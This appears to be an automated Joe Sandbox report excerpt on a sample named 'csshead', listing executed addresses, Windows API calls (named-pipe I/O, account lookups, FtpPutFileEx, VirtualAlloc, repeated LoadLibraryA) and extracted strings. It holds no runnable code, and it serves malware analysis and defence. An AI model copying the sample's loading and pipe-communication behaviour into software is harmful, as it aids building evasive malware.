0x0041ccb1
0x0041ccb8
0x0041ccbf
0x0041ccc8
0x0041ccce
0x0041ccd5
0x0041ccd7
0x0041ccd9
0x0041ccde
0x0041cce6
0x0041ccea
0x0041ccf5
0x0041ccf9
0x0041cd00
0x0041cd04
0x0041cd06
0x0041cd0c
0x0041cd0c
0x0041cd20
0x0041cd24
0x0041cd28
0x0041cd2c
0x0041cd34
0x0041cd38
0x0041cd3c
0x0041cd43
0x0041cd4a
0x0041cd50
0x0041cd5f
0x0041cd6a
0x0041cd70
0x0041cd84
0x0041cd89
0x0041cd8f
0x0041cdad
0x0041cdae
0x0041cdb9
0x0041cdca
0x0041ce4e
0x0041ce53
0x0041ce9e
0x0041ce9e
0x0041cea6
0x0041ceaa
0x0041ce55
0x0041ce67
0x0041ce6b
0x0041ce6b
0x0041cebd
0x0041cecf
0x0041ced6
0x0041ced8
0x0041ceda
0x0041ceda
0x0041ceda
0x0041cee0
0x0041cee0
0x0041cee0
0x0041cddd
0x0041ce00
0x0041ce13
0x0041ce1d
0x0041ce38
0x0041ce3f
0x0041ce45
0x0041ce45
0x0041cee9
0x0041cefb
0x0041cefb
0x0041cefb
0x0041ceeb
0x0041ceeb
0x0041ceeb
0x0041ceff
0x0041cf03
0x0041cf0b
0x0041cf11
0x0041cf20
0x0041cf20
0x0041cf20
0x0041cf13
0x0041cf17
0x0041cf17
0x0041cf27
0x0041cf27
0x0041cf2e
0x00000000
0x00000000
0x0041cf3d
0x0041cf72
0x0041cf72
0x0041cf74
0x0041cf3f
0x0041cf54
0x0041cf54
0x0041cf83
0x0041cfcb
0x0041cfd2
0x0041cfd4
0x0041cfd4
0x0041cfd4
0x00000000
0x0041cf85
0x0041cf85
0x0041cf8d
0x0041cf97
0x0041cfa9
0x0041cf99
0x0041cfa0
0x0041cfa0
0x0041cfb9
0x0041cfbf
0x0041cfbf
0x0041cfbf
0x0041cfc3
0x00000000
0x0041cfc9
0x00000000
0x0041cfc9
0x0041cfc3
0x0041cf83
0x0041cfda
0x0041cfec
0x0041cff0
0x0041cffd
0x0041d006
0x0041d01e
0x0041d024
0x0041d02a
0x0041d03b
0x0041d03b
0x0041d045
0x0041d04e
0x0041d05f
0x0041d067
0x0041d06f
0x0041d077
0x0041d088
0x0041d090
0x0041d097
0x0041d09b
0x0041d09d
0x0041d09d
0x0041d0b7
0x0041d0c0
0x0041d0c0
0x0041d0d3
0x0041d0e1
0x0041d0e4
0x0041d0e4
0x0041d0e6
0x0041d0f2
0x0041d101
0x0041d105
0x0041d108
0x0041d108
0x0041d11c
0x0041d120
0x0041d123
0x0041d123
0x0041d125
0x0041d151
0x0041d157
0x0041d15b
0x0041d16a
0x0041d16c
0x0041d172
0x0041d174
0x0041d179
0x0041d192
0x0041d195
0x0041d19b
0x0041d19f
0x0041d1aa
0x0041d1ac
0x0041d1ae
0x0041d1b2
0x0041d1b3
0x0041d1b8
0x0041d1bd
0x0041d1bd
0x0041d1c9
0x0041d1cb
0x0041d1cd
0x0041d1d1
0x0041d1d2
0x0041d1d7
0x0041d1dc
0x0041d1dc
0x0041d1f0
0x0041d1f8
0x0041d1fd
0x0041d1ff
0x0041d203
0x0041d204
0x0041d209
0x0041d20e
0x0041d20e
0x0041d211
0x0041d213
0x0041d216
0x0041d216
0x0041d213
0x0041d17b
0x0041d17d
0x0041d17e
0x0041d183
0x0041d188
0x0041d188
0x0041d21c
0x0041d223
0x0041d22a
0x0041d234
0x0041d238
0x0041d23c
0x0041d245
0x0041d249
0x0041d24c
0x0041d25f
0x0041d263
0x0041d267
0x0041d26b
0x0041d273
0x0041d27b
0x0041d280
0x0041d287
0x0041d28c
0x0041d292
0x0041d29a
0x0041d2ac
0x0041d2b1
0x0041d2c7
0x0041d2d3
0x0041d2db
0x0041d2e3
0x0041d2ef
0x0041d2f8
0x0041d301
0x0041d306
0x0041d306
0x0041d306
0x0041d31e
0x0041d321
0x0041d323
0x0041d336
0x0041d33a
0x0041d33e
0x0041d348
0x0041d34c
0x0041d359
0x0041d360
0x0041d39a
0x0041d3a9
0x0041d3b1
0x0041d3be
0x0041d3c2
0x0041d43b
0x0041d43f
0x0041d448
0x0041d44d
0x0041d452
0x0041d45a
0x0041d462
0x0041d467
0x0041d46f
0x0041d470
0x0041d470
0x0041d475
0x0041d479
0x0041d483
0x0041d485
0x0041d487
0x0041d487
0x0041d48f
0x0041d498
0x0041d4a0
0x0041d4a9
0x0041d4ae
0x0041d4af
0x0041d4b3
0x0041d4b7
0x0041d4bf
0x0041d4c7
0x0041d4d0
0x0041d4d0
0x0041d4d3
0x0041d4d7
0x0041d4ee
0x0041d4fe
0x0041d505
0x0041d511
0x0041d516
0x0041d525
0x0041d528
0x0041d52c
0x0041d531
0x0041d535
0x0041d539
0x0041d53d
0x0041d544
0x0041d54b
0x0041d552
0x0041d559
0x0041d55d
0x0041d561
0x0041d565
0x0041d569
0x0041d570
0x0041d582
0x0041d586
0x0041d58c
0x0041d590
0x0041d590
0x0041d5a0
0x0041d5a2
0x0041d5ab
0x0041d5ab
0x0041d5b8
0x0041d5be
0x0041d5c2
0x0041d5d0
0x0041d5e7
0x0041d5ed
0x0041d601
0x0041d603
0x0041d60c
0x0041d612
0x0041d612
0x0041d614
0x0041d614
0x0041d617
0x0041d61e
0x0041d629
0x0041d631
0x0041d638
0x0041d63c
0x0041d63c
0x0041d648
0x0041d65e
0x0041d65e
0x0041d65e
0x0041d64a
0x0041d651
0x0041d651
0x0041d665
0x0041d66e
0x0041d670
0x0041d678
0x0041d679
0x0041d67b
0x0041d67b
0x0041d683
0x0041d70f
0x0041d718
0x0041d745
0x0041d74b
0x0041d751
0x0041d759
0x0041d764
0x0041d768
0x0041d76f
0x0041d773
0x0041d77a
0x0041d77e
0x0041d784
0x0041d79c
0x0041d79e
0x0041d7a4
0x0041d7a6
0x0041d7a8
0x0041d7a8
0x0041d7aa
0x0041d7c0
0x0041d7c2
0x0041d7c4
0x0041d7c6
0x0041d7d0
0x0041d7d2
0x0041d7d2
0x0041d7d4
0x0041d7e7
0x0041d7e9
0x0041d7eb
0x0041d7ed
0x0041d7fa
0x0041d7fc
0x0041d806
0x0041d808
0x0041d808
0x0041d81f
0x0041d821
0x0041d823
0x0041d829
0x0041d840
0x0041d842
0x0041d844
0x0041d85c
0x0041d85e
0x0041d860
0x0041d862
0x0041d876
0x0041d878
0x0041d87a
0x0041d87c
0x0041d887
0x0041d889
0x0041d896
0x0041d898
0x0041d89a
0x0041d89c
0x0041d8b0
0x0041d8b0
0x0041d8b2
0x0041d8bf
0x0041d8bf
0x0041d87a
0x0041d860
0x0041d8c1
0x0041d8c8
0x0041d8ca
0x0041d8d2
0x0041d8d2
0x0041d8d4
0x0041d8d8
0x0041d8da
0x0041d8e2
0x0041d8e2
0x0041d8da
0x0041d8e4
0x0041d8f1
0x0041d8f3
0x0041d8fd
0x0041d8ff
0x0041d909
0x0041d90b
0x0041d911
0x0041d916
0x0041d91f
0x0041d929
0x0041d92f
0x0041d93a
0x0041d93e
0x0041d94d
0x0041d958
0x0041d95a
0x0041d961
0x0041d969
0x0041d969
0x0041d96b
0x0041d96b
0x0041d982
0x0041d987
0x0041d98b
0x0041d999
0x0041d9a0
0x0041d9ab
0x0041d9b2
0x0041d9b8
0x0041d9ba
0x0041d9c5
0x0041d9bc
0x0041d9bc
0x0041d9bc
0x0041d9d5
0x0041d9da
0x0041d9e8
0x0041d9ef
0x0041d9fa
0x0041da00
0x0041da0f
0x0041da1e
0x0041da2d
0x0041da38
0x0041da4d
0x0041da53
0x0041da59
0x0041da62
0x0041da62
0x0041da68
0x0041da6c
0x0041da6e
0x0041db16
0x0041db1b
0x0041db29
0x0041db2e
0x0041db34
0x0041db3c
0x0041db9d
0x0041db9e
0x0041db9f
0x0041dba4
0x0041dba7
0x0041db3e
0x0041db45
0x0041db50
0x0041db57
0x0041db5e
0x0041db65
0x0041db6c
0x0041db73
0x0041db7a
0x0041db7f
0x0041db86
0x0041db88
0x0041db88
0x0041dbae
0x0041dbb3
0x0041dbb9
0x0041da74
0x0041da80
0x0041da86
0x0041da88
0x0041da8a
0x00000000
0x00000000
0x0041da92
0x0041da94
0x0041da96
0x0041daf5
0x0041db07
0x0041dbbf
0x0041dbc4
0x0041dbc9
0x0041dbdb
0x0041dbdb
0x0041da9e
0x0041daa0
0x0041daa2
0x0041db0e
0x0041db0e
0x00000000
0x0041db0e
0x0041daaa
0x0041daac
0x0041daae
0x00000000
0x00000000
0x0041dabe
0x0041dac0
0x0041dac3
0x0041dac5
0x00000000
0x00000000
0x00000000
0x0041dac7
0x0041dad2
0x0041dae4
0x0041dae4
0x00000000
0x0041d694
0x0041d69b
0x0041d6a3
0x0041d6a7
0x0041d6ab
0x0041d6af
0x0041d6ba
0x00000000
0x00000000
0x0041d6d7
0x0041d6dd
0x0041d6dd
0x0041d6ed
0x0041d6fa
0x0041d708
0x00000000
0x0041d708
0x0041d683
0x0041d590
0x0041d3c8
0x0041d3cc
0x0041d3d2
0x0041d3d6
0x0041d3df
0x0041d3e1
0x0041d3e3
0x0041d3ed
0x0041d3ee
0x0041d3f1
0x0041d3f4
0x0041d3fd
0x0041d3ff
0x0041d408
0x0041d413
0x0041d41a
0x0041d41b
0x0041d422
0x0041d425
0x0041d42d
0x0041d431
0x0041d435
0x0041d439
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d362
0x0041d362
0x0041d362
0x0041d36a
0x0041d37a
0x0041d37c
0x0041d37c
0x0041d37c
0x0041d382
0x0041d390
0x0041d395
0x0041d396
0x00000000

APIs

EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,00000000,?,?), ref: 0041C981

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D

EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,?,?,?), ref: 0041C9A5
OpenColorProfileA.MSCMS ref: 0041CA46
OpenColorProfileA.MSCMS(?,00000001,00000001,00000003), ref: 0041CA66
EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,00000000,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAA5
EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,00000000,?,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAC9
LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAE5
LoadIconA.USER32(00000000,00000064), ref: 0041CAF0
800001A3.OLEAUT32 ref: 0041CB1D
GetHGlobalFromStream.OLE32(?,?), ref: 0041CB55
LoadLibraryA.KERNELBASE(open), ref: 0041CB7D
LoadIconA.USER32(00000000,00000064), ref: 0041CB82
800001A3.OLEAUT32(?,?,00000001,?), ref: 0041CBA9
GetHGlobalFromStream.OLE32(?,?), ref: 0041CBE1
EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,00000000,00000000,?), ref: 0041CC53
EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041CC77
GetDC.USER32(00000000), ref: 0041CD06
CreateEventA.KERNEL32(00000058,00000058,00000058,Xstore), ref: 0041CD17
GetClassLongA.USER32(00000058,000000E6), ref: 0041CD4A
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 0041CD5F
GetCursorPos.USER32(0000000A), ref: 0041CD6A
GetCursorPos.USER32(?), ref: 0041CD89
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 0041CDB9
CommDlgExtendedError.COMDLG32 ref: 0041CE3F
WaitForSingleObject.KERNEL32(?,00000BB7,00000000), ref: 0041CFB9
WaitNamedPipeA.KERNEL32(\\.\pipe\pipe,000000FF), ref: 0041D097
CreateFileA.KERNELBASE(\\.\pipe\pipe,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0B7
SetNamedPipeHandleState.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0D3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0E4
WriteFile.KERNELBASE(00000000,00433E5C,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D101
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D108
ReadFile.KERNELBASE(00000000,?,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D11C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D123
LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D16A
GetLastError.KERNEL32 ref: 0041D172
GetLastError.KERNEL32 ref: 0041D17B
GetLastError.KERNEL32 ref: 0041D190
LocalAlloc.KERNEL32(00000040,?), ref: 0041D1A8
GetLastError.KERNEL32 ref: 0041D1B0
LocalAlloc.KERNEL32(00000040,?), ref: 0041D1C7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D1CF
LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D1FB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D201

Part of subcall function 004242F0: __ftbuf.LIBCMT ref: 00424367

LocalFree.KERNEL32(00000000), ref: 0041D216
SetStretchBltMode.GDI32(00000000,00000004), ref: 0041D2F8
SetAbortProc.GDI32(00000000,Function_000047A0), ref: 0041D323
DrawFrameControl.USER32(?,?,00000004,00004210), ref: 0041D34C
LoadImageA.USER32(?,?,00000000,00000000,00000000,00000000), ref: 0041D3B1
SetWindowLongA.USER32(00000000,000000EC,00000080), ref: 0041D3DF

Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EC), ref: 00417F10
Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EC), ref: 00417F23
Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
Part of subcall function 00417E60: OleUninitialize.OLE32 ref: 00417F51
Part of subcall function 00417E60: OleInitialize.OLE32(00000000), ref: 00417F5E
Part of subcall function 00417E60: GetWindowTextLengthA.USER32(?), ref: 00417F68
Part of subcall function 00417E60: GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
Part of subcall function 00417E60: SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
Part of subcall function 00417E60: GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
Part of subcall function 00417E60: GlobalLock.KERNEL32(00000000), ref: 00417FF7
Part of subcall function 00417E60: GlobalUnlock.KERNEL32(00000000), ref: 00418012
Part of subcall function 00417E60: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0041801F
Part of subcall function 00417E60: lstrlenA.KERNEL32(00000000), ref: 00418031
Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
Part of subcall function 00417E60: DefWindowProcA.USER32(?,?,?,?), ref: 00418176

CreateEventA.KERNEL32(00000000,00000000,00000000,denfers,?,00000005,?,00000005), ref: 0041D577
GetCursorPos.USER32(00000005), ref: 0041D586
GetCursorPos.USER32(?), ref: 0041D5B8
DragQueryFileA.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
GetNumberOfPhysicalMonitorsFromHMONITOR.DXVA2(00000000,?), ref: 0041D67B
CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
CoInitializeEx.OLE32(00000000,00000002), ref: 0041D77E
CoCreateInstance.OLE32(00433FFC,00000000,00000001,0043A508,?), ref: 0041D79C
CoUninitialize.OLE32 ref: 0041D7A8
CoUninitialize.OLE32 ref: 0041D7D2
CoUninitialize.OLE32 ref: 0041D808
CoCreateInstance.OLE32(?,00000000,00000001,0043A4F8,00000000), ref: 0041D81F
CoCreateInstance.OLE32(0043400C,00000000,00000001,0043A4F8,?), ref: 0041D85C
CoUninitialize.OLE32 ref: 0041D90B
GetDlgItem.USER32(00000000,00000000), ref: 0041D91F
OleInitialize.OLE32(00000000), ref: 0041D929
CoLockObjectExternal.OLE32(00000000,00000001,00000000), ref: 0041D93A
RegisterDragDrop.OLE32(00000000,00000000), ref: 0041D93E
GetTopWindow.USER32(00000000), ref: 0041D946
RevokeDragDrop.OLE32(00000000), ref: 0041D94D
CoLockObjectExternal.OLE32(00000000,00000000,00000001), ref: 0041D958
OleUninitialize.OLE32 ref: 0041D96B
SetMenuItemInfoA.USER32 ref: 0041D9B2
GetLastError.KERNEL32 ref: 0041D9BC
DrawMenuBar.USER32(00000000), ref: 0041D9C5
GetMenuItemInfoA.USER32 ref: 0041D9FA
BeginPaint.USER32(00000000,?), ref: 0041DA0F
EndPaint.USER32(00000000,?), ref: 0041DA1E
GetClientRect.USER32 ref: 0041DA38
EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
lstrcmpiA.KERNEL32(?,UnregServer), ref: 0041DA86
lstrcmpiA.KERNEL32(?,RegServer), ref: 0041DA92
lstrcmpiA.KERNEL32(?,Automation), ref: 0041DA9E
lstrcmpiA.KERNEL32(?,Embedding), ref: 0041DAAA

Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D3B
Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D42
Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D51

Part of subcall function 0040F280: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040F2F6
Part of subcall function 0040F280: lstrlenA.KERNEL32(?), ref: 0040F33C
Part of subcall function 0040F280: GetModuleHandleA.KERNEL32(00000000,?,00000003,?), ref: 0040F3DB
Part of subcall function 0040F280: lstrlenW.KERNEL32(?,?,?,?,?,00000003,?), ref: 0040F443

Part of subcall function 00405200: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040520C
Part of subcall function 00405200: CloseHandle.KERNEL32(00000000), ref: 0040524A

Part of subcall function 00405010: CoRegisterClassObject.OLE32(?,?,?,?,?), ref: 00405062

CoResumeClassObjects.OLE32 ref: 0041DB2E
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBC9

Part of subcall function 004050E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004050FD
Part of subcall function 004050E0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040511F
Part of subcall function 004050E0: TranslateMessage.USER32(?), ref: 0040513C
Part of subcall function 004050E0: DispatchMessageA.USER32(?), ref: 00405143

Part of subcall function 004198E0: EnterCriticalSection.KERNEL32 ref: 0041991C
Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
Part of subcall function 004198E0: LeaveCriticalSection.KERNEL32(-00000010,-00000010,-00000010), ref: 00419942
Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA

Part of subcall function 004050A0: CoRevokeClassObject.OLE32(?), ref: 004050C1

Sleep.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0041DBB9

Part of subcall function 004093B0: CloseHandle.KERNEL32(?), ref: 004093BC

Strings

\\.\pipe\pipe, xrefs: 0041D092
6, xrefs: 0041D273
open, xrefs: 0041CAE0, 0041CB78
Xstore, xrefs: 0041CD0F
<XC, xrefs: 0041CA56
VUUU, xrefs: 0041CDF0
z, xrefs: 0041D452
Automation, xrefs: 0041DA98
Enhanced Video Renderer, xrefs: 0041D86C
Y, xrefs: 0041CCDE
Embedding, xrefs: 0041DAA4
RegServer, xrefs: 0041DA8C
denfers, xrefs: 0041D51D
LookupAccountName failed with %d, xrefs: 0041D204
LocalAlloc failed with %d, xrefs: 0041D1B3
LZC, xrefs: 0041DB7F
LocalAlloc failed with %d, xrefs: 0041D1D2
Push Source, xrefs: 0041D839
0, xrefs: 0041D45A
LookupAccountName failed with %d, xrefs: 0041D17E
UnregServer, xrefs: 0041DA80
\\.\pipe\pipe, xrefs: 0041D0B2

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00419D20, Relevance: 126.7, APIs: 66, Strings: 5, Instructions: 2465
librarycomwindow

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00419D2C
NtdllDefWindowProc_A.NTDLL(00000000,00000000,00000000,00000000), ref: 00419D3A

Part of subcall function 00418480: RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041848C
Part of subcall function 00418480: RegisterClassExA.USER32 ref: 00418531
Part of subcall function 00418480: RegisterClassExA.USER32 ref: 004185D5
Part of subcall function 00418480: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00418604

GetCommandLineA.KERNEL32 ref: 00419DA4
CreateMenu.USER32 ref: 00419EAE
LoadBitmapA.USER32(?,00433E0C), ref: 00419EDC
AppendMenuA.USER32(00000000,00000014,?,00000000), ref: 00419EEC
BeginDeferWindowPos.USER32(00442A98), ref: 00419F07
CreateMetaFileA.GDI32(?), ref: 00419F2B
SetBrushOrgEx.GDI32(00000000,00000001,00000000,00000000), ref: 00419F3A
LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00419F6A

Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960

FtpPutFileEx.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A00D
GetSysColorBrush.USER32(0000000F), ref: 0041A084
FrameRect.USER32(00000000,?,00000000), ref: 0041A094
GlobalAlloc.KERNELBASE(00001000,00000838), ref: 0041A0C0
GetLastError.KERNEL32 ref: 0041A101
GetIconInfo.USER32(00000000,?), ref: 0041A12D
GetIconInfo.USER32(00000000,?), ref: 0041A14D
mmioSetInfo.WINMM(0000002F,?,0000002F), ref: 0041A422
mmioAscend.WINMM(0000002F,?,0000002F), ref: 0041A457
GetSystemInfo.KERNELBASE(?), ref: 0041A47E
GetSystemTimeAsFileTime.KERNEL32(?), ref: 0041A4E5
SetConsoleCtrlHandler.KERNEL32(00442AA0,00000001), ref: 0041A4F3
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0041A572
CopyImage.USER32(?,00000000,?,00442AA4,00000008), ref: 0041A93E
DrawMenuBar.USER32(00000061), ref: 0041AA1D
FindResourceA.KERNEL32(00000061,?,00433E2C), ref: 0041AA31
VirtualAlloc.KERNELBASE(00000000,00342AA0,00003000,00000022), ref: 0041AA4F
LoadLibraryA.KERNELBASE(0043584C), ref: 0041AAAF
OleCreatePictureIndirect.OLEAUT32 ref: 0041AAE1
LoadLibraryA.KERNELBASE(0043584C,?,00000001,?), ref: 0041AB71
LoadLibraryA.KERNELBASE(0043584C,?,?,?,?,00000001,?), ref: 0041AC29

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D

LoadLibraryA.KERNELBASE(0043584C,00000002,00000000), ref: 0041AE48
OleCreatePictureIndirect.OLEAUT32 ref: 0041AE74
LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,00000000,?,?,?,00000003,?,00000001,00000001,00000003,?,?), ref: 0041AF4B
OleCreatePictureIndirect.OLEAUT32 ref: 0041AF7D
LoadLibraryA.KERNELBASE(0043584C,?,00000001,00000001,00000003), ref: 0041B0C5
OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041B0F1
LoadLibraryA.KERNELBASE(0043584C,00000002,00000000), ref: 0041B4E7
LoadIconA.USER32(00000000,00000064), ref: 0041B4F0
OleCreatePictureIndirect.OLEAUT32 ref: 0041B51A
LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,?,?,?,00000003,00000001,00000000), ref: 0041B6B1
LoadLibraryA.KERNELBASE(0043584C), ref: 0041B72C
LoadLibraryA.KERNELBASE(0043584C,00000000,?,?,?,00000001,00000001,00000003,?,?,?,?,?,00000001,?), ref: 0041B90F
OleCreatePictureIndirect.OLEAUT32 ref: 0041B93B
LoadLibraryA.KERNELBASE(0043584C), ref: 0041B9DE
LoadIconA.USER32(00000000,00000064), ref: 0041B9E3
OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041BA0E
LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,00000000,?,?,?,?,?,?), ref: 0041BB90
LoadIconA.USER32(00000000,00000064), ref: 0041BB95
OleCreatePictureIndirect.OLEAUT32 ref: 0041BBC0
LoadLibraryA.KERNELBASE(0043584C,?,00000001,00000001,00000003), ref: 0041C08A
LoadIconA.USER32(00000000,00000064), ref: 0041C08F
OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041C0BA
LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,?,?,?,00000003,00000000,?,?,?,00000003,00000000,00000000), ref: 0041C2AB
OleCreatePictureIndirect.OLEAUT32 ref: 0041C2DD
LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,00000000,?,?,?), ref: 0041C3B6
OleCreatePictureIndirect.OLEAUT32 ref: 0041C3E2
LoadLibraryA.KERNELBASE(0043584C,00000001,00000001,00000003,?,00000001,00000001,00000003,?,?,?,00000001,?), ref: 0041C5C1
LoadIconA.USER32(00000000,00000064), ref: 0041C5C6
OleCreatePictureIndirect.OLEAUT32 ref: 0041C5F1
LoadLibraryA.KERNELBASE(0043584C,?,?,?,?,?,?,?,?,?,00000001,?,?,?,?,00000001), ref: 0041C6E7
LoadIconA.USER32(00000000,00000064), ref: 0041C6EC
OleCreatePictureIndirect.OLEAUT32 ref: 0041C717
LoadLibraryA.KERNELBASE(0043584C,00000002,00000000), ref: 0041C8B9
LoadIconA.USER32(00000000,00000064), ref: 0041C8BE
OleCreatePictureIndirect.OLEAUT32 ref: 0041C8E9

Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3

Strings

.icm, xrefs: 0041C49E
<XC, xrefs: 0041C816
(XC, xrefs: 0041DBFA
Profile, xrefs: 0041ACEA
m, xrefs: 0041A9D7

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041C95B, Relevance: 83.6, APIs: 40, Strings: 7, Instructions: 1340windowfilecom

APIs

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D

LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,00000000,?,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAE5
LoadLibraryA.KERNELBASE(0043584C), ref: 0041CB7D
CreateEventA.KERNEL32(00000058,00000058,00000058,00433E30), ref: 0041CD17
GetClassLongA.USER32(00000058,000000E6), ref: 0041CD4A
SetClassLongA.USER32(00442AA8,000000E6,00000000), ref: 0041CD5F
GetCursorPos.USER32(0000000A), ref: 0041CD6A
GetCursorPos.USER32(?), ref: 0041CD89
WaitForSingleObject.KERNEL32(?,00000BB7,00000000), ref: 0041CFB9
WaitNamedPipeA.KERNEL32(00433E3C,000000FF,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D097
CreateFileA.KERNELBASE(00433E4C,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0B7
SetNamedPipeHandleState.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0D3
WriteFile.KERNELBASE(00000000,00433E5C,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D101
ReadFile.KERNELBASE(00000000,?,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D11C
LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D16A
LocalFree.KERNEL32(00000000), ref: 0041D216

Part of subcall function 004242F0: __woutput_l.LIBCMT ref: 00424356
Part of subcall function 004242F0: __ftbuf.LIBCMT ref: 00424367

SetAbortProc.GDI32(00000000,004047A0), ref: 0041D323
DrawFrameControl.USER32(?,?,00000004,00004210), ref: 0041D34C
LoadImageA.USER32(?,?,00000000,00000000,00000000,00000000), ref: 0041D3B1

Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
Part of subcall function 00417E60: OleUninitialize.OLE32 ref: 00417F51
Part of subcall function 00417E60: OleInitialize.OLE32(00000000), ref: 00417F5E
Part of subcall function 00417E60: GetWindowTextLengthA.USER32(?), ref: 00417F68
Part of subcall function 00417E60: GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
Part of subcall function 00417E60: SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
